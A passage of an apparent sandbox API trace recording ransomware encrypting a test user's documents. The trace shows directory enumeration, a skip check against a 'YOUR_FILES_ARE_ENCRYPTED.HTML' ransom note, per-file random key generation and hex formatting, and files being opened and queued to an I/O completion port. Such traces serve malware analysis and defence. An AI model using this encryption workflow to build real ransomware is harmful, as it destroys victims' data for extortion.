returned 2 [0166.621] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="3C") returned 2 [0166.621] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="84") returned 2 [0166.621] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="89") returned 2 [0166.622] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="43") returned 2 [0166.622] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="30") returned 2 [0166.622] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="3C") returned 2 [0166.622] wsprintfW (in: 
param_1=0x4ebdaa2, param_2="%02X" | out: param_1="74") returned 2 [0166.622] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="45") returned 2 [0166.622] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="82") returned 2 [0166.622] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="A9") returned 2 [0166.622] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="18") returned 2 [0166.623] lstrcpyW (in: lpString1=0x76a00bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\auji kIm2DapmjjR1s1D.pdf" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\auji kIm2DapmjjR1s1D.pdf") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\auji kIm2DapmjjR1s1D.pdf" [0166.623] CreateIoCompletionPort (FileHandle=0x5b0, ExistingCompletionPort=0x3a0, CompletionKey=0x7690008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.623] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7690008, lpOverlapped=0x7690008) returned 1 [0166.630] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x143c2bf0, ftCreationTime.dwHighDateTime=0x1d7e214, ftLastAccessTime.dwLowDateTime=0xc1362c00, ftLastAccessTime.dwHighDateTime=0x1d7e3ce, ftLastWriteTime.dwLowDateTime=0xc1362c00, ftLastWriteTime.dwHighDateTime=0x1d7e3ce, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d2cfb2, dwReserved1=0x0, cFileName="f JTmrxPq5", cAlternateFileName="FJTMRX~1")) returned 1 [0166.630] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\f JTmrxPq5") returned 55 [0166.630] GetProcessHeap () returned 0x270000 [0166.630] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0166.630] lstrcpyW (in: lpString1=0x74d2010, 
lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\f JTmrxPq5" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\f JTmrxPq5") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\f JTmrxPq5" [0166.630] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\f JTmrxPq5", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\f JTmrxPq5\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\f JTmrxPq5\\*" [0166.630] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\f JTmrxPq5\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x143c2bf0, ftCreationTime.dwHighDateTime=0x1d7e214, ftLastAccessTime.dwLowDateTime=0xc1362c00, ftLastAccessTime.dwHighDateTime=0x1d7e3ce, ftLastWriteTime.dwLowDateTime=0xc1362c00, ftLastWriteTime.dwHighDateTime=0x1d7e3ce, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xff2a5d2b, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0166.633] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x143c2bf0, ftCreationTime.dwHighDateTime=0x1d7e214, ftLastAccessTime.dwLowDateTime=0xc1362c00, ftLastAccessTime.dwHighDateTime=0x1d7e3ce, ftLastWriteTime.dwLowDateTime=0xc1362c00, ftLastWriteTime.dwHighDateTime=0x1d7e3ce, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xff2a5d2b, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0166.633] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdaa0d3b0, ftCreationTime.dwHighDateTime=0x1d7e6ae, ftLastAccessTime.dwLowDateTime=0x293a7f70, ftLastAccessTime.dwHighDateTime=0x1d7e6ce, ftLastWriteTime.dwLowDateTime=0x293a7f70, 
ftLastWriteTime.dwHighDateTime=0x1d7e6ce, nFileSizeHigh=0x0, nFileSizeLow=0xb871, dwReserved0=0xff2a5d2b, dwReserved1=0xffffffff, cFileName="AkyUOHSiqSLINrjDCfZ.ots", cAlternateFileName="AKYUOH~1.OTS")) returned 1 [0166.633] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\f JTmrxPq5\\AkyUOHSiqSLINrjDCfZ.ots") returned 79 [0166.633] lstrcmpW (lpString1="AkyUOHSiqSLINrjDCfZ.ots", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.634] PathFindExtensionW (pszPath="AkyUOHSiqSLINrjDCfZ.ots") returned=".ots" [0166.634] lstrlenW (lpString=".ots") returned 4 [0166.634] PathFindExtensionW (pszPath="AkyUOHSiqSLINrjDCfZ.ots") returned=".ots" [0166.634] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc77ff8c0, ftCreationTime.dwHighDateTime=0x1d7dcd0, ftLastAccessTime.dwLowDateTime=0x6fed4830, ftLastAccessTime.dwHighDateTime=0x1d7e061, ftLastWriteTime.dwLowDateTime=0x6fed4830, ftLastWriteTime.dwHighDateTime=0x1d7e061, nFileSizeHigh=0x0, nFileSizeLow=0x5c58, dwReserved0=0xff2a5d2b, dwReserved1=0xffffffff, cFileName="hTZUPdS9n1aSQ.rtf", cAlternateFileName="HTZUPD~1.RTF")) returned 1 [0166.634] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\f JTmrxPq5\\hTZUPdS9n1aSQ.rtf") returned 73 [0166.634] lstrcmpW (lpString1="hTZUPdS9n1aSQ.rtf", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.634] PathFindExtensionW (pszPath="hTZUPdS9n1aSQ.rtf") returned=".rtf" [0166.634] lstrlenW (lpString=".rtf") returned 4 [0166.634] PathFindExtensionW (pszPath="hTZUPdS9n1aSQ.rtf") returned=".rtf" [0166.634] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0166.634] CreateFileW 
(lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\f JTmrxPq5\\hTZUPdS9n1aSQ.rtf" (normalized: "c:\\users\\5alr3u30d3\\documents\\cxn1g6nnkt\\f jtmrxpq5\\htzupds9n1asq.rtf"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0166.635] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=23640) returned 1 [0166.635] GetProcessHeap () returned 0x270000 [0166.635] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7690008 [0166.636] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="49") returned 2 [0166.636] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="34") returned 2 [0166.636] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="48") returned 2 [0166.636] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="B6") returned 2 [0166.636] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="A2") returned 2 [0166.636] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="8B") returned 2 [0166.636] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="0A") returned 2 [0166.636] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="45") returned 2 [0166.636] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="E9") returned 2 [0166.636] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="A1") returned 2 [0166.636] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="9E") returned 2 [0166.636] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="03") returned 2 [0166.636] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="AE") returned 2 [0166.636] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="AC") returned 2 [0166.637] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="B0") returned 2 [0166.637] 
wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="B3") returned 2 [0166.637] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="6E") returned 2 [0166.637] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="B9") returned 2 [0166.637] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="13") returned 2 [0166.637] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="CB") returned 2 [0166.637] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="5D") returned 2 [0166.637] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="A0") returned 2 [0166.637] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="C9") returned 2 [0166.637] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="55") returned 2 [0166.637] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="78") returned 2 [0166.637] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="4A") returned 2 [0166.637] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="2F") returned 2 [0166.637] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="1E") returned 2 [0166.637] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="DD") returned 2 [0166.637] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="8F") returned 2 [0166.637] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="9B") returned 2 [0166.637] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="7D") returned 2 [0166.638] lstrcpyW (in: lpString1=0x76a00bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\f JTmrxPq5\\hTZUPdS9n1aSQ.rtf" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\f JTmrxPq5\\hTZUPdS9n1aSQ.rtf") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\f JTmrxPq5\\hTZUPdS9n1aSQ.rtf" [0166.638] CreateIoCompletionPort (FileHandle=0x598, ExistingCompletionPort=0x3a0, CompletionKey=0x7690008, 
NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.638] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7690008, lpOverlapped=0x7690008) returned 1 [0166.647] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98441430, ftCreationTime.dwHighDateTime=0x1d7d80a, ftLastAccessTime.dwLowDateTime=0x29386c00, ftLastAccessTime.dwHighDateTime=0x1d7e33e, ftLastWriteTime.dwLowDateTime=0x29386c00, ftLastWriteTime.dwHighDateTime=0x1d7e33e, nFileSizeHigh=0x0, nFileSizeLow=0xe01b, dwReserved0=0xff2a5d2b, dwReserved1=0xffffffff, cFileName="iZSQPfkU9OoDlqQRm.rtf", cAlternateFileName="IZSQPF~1.RTF")) returned 1 [0166.647] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\f JTmrxPq5\\iZSQPfkU9OoDlqQRm.rtf") returned 77 [0166.647] lstrcmpW (lpString1="iZSQPfkU9OoDlqQRm.rtf", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.647] PathFindExtensionW (pszPath="iZSQPfkU9OoDlqQRm.rtf") returned=".rtf" [0166.647] lstrlenW (lpString=".rtf") returned 4 [0166.647] PathFindExtensionW (pszPath="iZSQPfkU9OoDlqQRm.rtf") returned=".rtf" [0166.647] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0166.647] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\f JTmrxPq5\\iZSQPfkU9OoDlqQRm.rtf" (normalized: "c:\\users\\5alr3u30d3\\documents\\cxn1g6nnkt\\f jtmrxpq5\\izsqpfku9oodlqqrm.rtf"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0166.648] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=57371) returned 1 [0166.648] GetProcessHeap () returned 0x270000 [0166.648] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, 
Size=0x28150) returned 0x7690008 [0166.649] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="CB") returned 2 [0166.649] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="84") returned 2 [0166.649] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="3A") returned 2 [0166.649] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="22") returned 2 [0166.649] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="99") returned 2 [0166.649] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="68") returned 2 [0166.649] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="2E") returned 2 [0166.649] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="B7") returned 2 [0166.649] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="5A") returned 2 [0166.649] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="6D") returned 2 [0166.649] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="8B") returned 2 [0166.650] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="B5") returned 2 [0166.650] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="7E") returned 2 [0166.650] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="B1") returned 2 [0166.650] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="A5") returned 2 [0166.650] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="17") returned 2 [0166.650] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="AE") returned 2 [0166.650] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="FE") returned 2 [0166.650] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="19") returned 2 [0166.650] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="5D") returned 2 [0166.650] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="A8") returned 2 [0166.650] wsprintfW (in: 
param_1=0x4ebd77e, param_2="%02X" | out: param_1="FC") returned 2 [0166.650] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="C4") returned 2 [0166.650] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="F1") returned 2 [0166.650] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="45") returned 2 [0166.650] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="61") returned 2 [0166.650] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="69") returned 2 [0166.650] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="41") returned 2 [0166.650] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="15") returned 2 [0166.650] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="C5") returned 2 [0166.650] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="6B") returned 2 [0166.650] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="50") returned 2 [0166.651] lstrcpyW (in: lpString1=0x76a00bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\f JTmrxPq5\\iZSQPfkU9OoDlqQRm.rtf" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\f JTmrxPq5\\iZSQPfkU9OoDlqQRm.rtf") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\f JTmrxPq5\\iZSQPfkU9OoDlqQRm.rtf" [0166.651] CreateIoCompletionPort (FileHandle=0x598, ExistingCompletionPort=0x3a0, CompletionKey=0x7690008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.651] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7690008, lpOverlapped=0x7690008) returned 1 [0166.658] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24ef7010, ftCreationTime.dwHighDateTime=0x1d7e3e0, ftLastAccessTime.dwLowDateTime=0x22a46dc0, ftLastAccessTime.dwHighDateTime=0x1d7e745, ftLastWriteTime.dwLowDateTime=0x22a46dc0, 
ftLastWriteTime.dwHighDateTime=0x1d7e745, nFileSizeHigh=0x0, nFileSizeLow=0x5820, dwReserved0=0xff2a5d2b, dwReserved1=0xffffffff, cFileName="o5nATWfNm.pps", cAlternateFileName="O5NATW~1.PPS")) returned 1 [0166.660] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\f JTmrxPq5\\o5nATWfNm.pps") returned 69 [0166.660] lstrcmpW (lpString1="o5nATWfNm.pps", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.660] PathFindExtensionW (pszPath="o5nATWfNm.pps") returned=".pps" [0166.660] lstrlenW (lpString=".pps") returned 4 [0166.660] PathFindExtensionW (pszPath="o5nATWfNm.pps") returned=".pps" [0166.660] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0166.660] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\f JTmrxPq5\\o5nATWfNm.pps" (normalized: "c:\\users\\5alr3u30d3\\documents\\cxn1g6nnkt\\f jtmrxpq5\\o5natwfnm.pps"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0166.661] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=22560) returned 1 [0166.661] GetProcessHeap () returned 0x270000 [0166.661] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7690008 [0166.661] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="01") returned 2 [0166.661] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="4E") returned 2 [0166.661] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="F2") returned 2 [0166.662] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="68") returned 2 [0166.662] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="F1") returned 2 [0166.662] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="00") returned 2 [0166.662] 
wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="38") returned 2 [0166.662] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="22") returned 2 [0166.662] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="1D") returned 2 [0166.662] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="BC") returned 2 [0166.662] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="25") returned 2 [0166.662] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="D8") returned 2 [0166.662] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="9D") returned 2 [0166.662] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="66") returned 2 [0166.662] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="C6") returned 2 [0166.662] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="6C") returned 2 [0166.662] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="30") returned 2 [0166.662] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="7F") returned 2 [0166.662] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="D4") returned 2 [0166.662] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="0C") returned 2 [0166.662] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="BC") returned 2 [0166.662] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="CA") returned 2 [0166.662] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="8D") returned 2 [0166.662] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="15") returned 2 [0166.662] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="0D") returned 2 [0166.662] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="25") returned 2 [0166.662] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="4B") returned 2 [0166.663] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: 
param_1="8C") returned 2 [0166.663] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="37") returned 2 [0166.663] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="27") returned 2 [0166.663] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="4F") returned 2 [0166.663] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="72") returned 2 [0166.663] lstrcpyW (in: lpString1=0x76a00bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\f JTmrxPq5\\o5nATWfNm.pps" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\f JTmrxPq5\\o5nATWfNm.pps") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\f JTmrxPq5\\o5nATWfNm.pps" [0166.663] CreateIoCompletionPort (FileHandle=0x598, ExistingCompletionPort=0x3a0, CompletionKey=0x7690008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.664] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7690008, lpOverlapped=0x7690008) returned 1 [0166.676] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d5e75d0, ftCreationTime.dwHighDateTime=0x1d7e2a5, ftLastAccessTime.dwLowDateTime=0x69763ca0, ftLastAccessTime.dwHighDateTime=0x1d7e72d, ftLastWriteTime.dwLowDateTime=0x69763ca0, ftLastWriteTime.dwHighDateTime=0x1d7e72d, nFileSizeHigh=0x0, nFileSizeLow=0x575f, dwReserved0=0xff2a5d2b, dwReserved1=0xffffffff, cFileName="XfvX6mEZdudE-A vLi.odp", cAlternateFileName="XFVX6M~1.ODP")) returned 1 [0166.676] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\f JTmrxPq5\\XfvX6mEZdudE-A vLi.odp") returned 78 [0166.676] lstrcmpW (lpString1="XfvX6mEZdudE-A vLi.odp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.676] PathFindExtensionW (pszPath="XfvX6mEZdudE-A vLi.odp") returned=".odp" [0166.676] lstrlenW 
(lpString=".odp") returned 4 [0166.676] PathFindExtensionW (pszPath="XfvX6mEZdudE-A vLi.odp") returned=".odp" [0166.676] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0166.676] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\f JTmrxPq5\\XfvX6mEZdudE-A vLi.odp" (normalized: "c:\\users\\5alr3u30d3\\documents\\cxn1g6nnkt\\f jtmrxpq5\\xfvx6mezdude-a vli.odp"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0166.676] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=22367) returned 1 [0166.677] GetProcessHeap () returned 0x270000 [0166.677] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7690008 [0166.677] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="81") returned 2 [0166.677] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="C1") returned 2 [0166.677] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="BF") returned 2 [0166.677] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="D2") returned 2 [0166.677] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="A1") returned 2 [0166.677] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="63") returned 2 [0166.677] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="A2") returned 2 [0166.677] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="FC") returned 2 [0166.677] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="B8") returned 2 [0166.677] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="8A") returned 2 [0166.677] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="B6") returned 2 [0166.678] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="89") returned 2 [0166.678] wsprintfW 
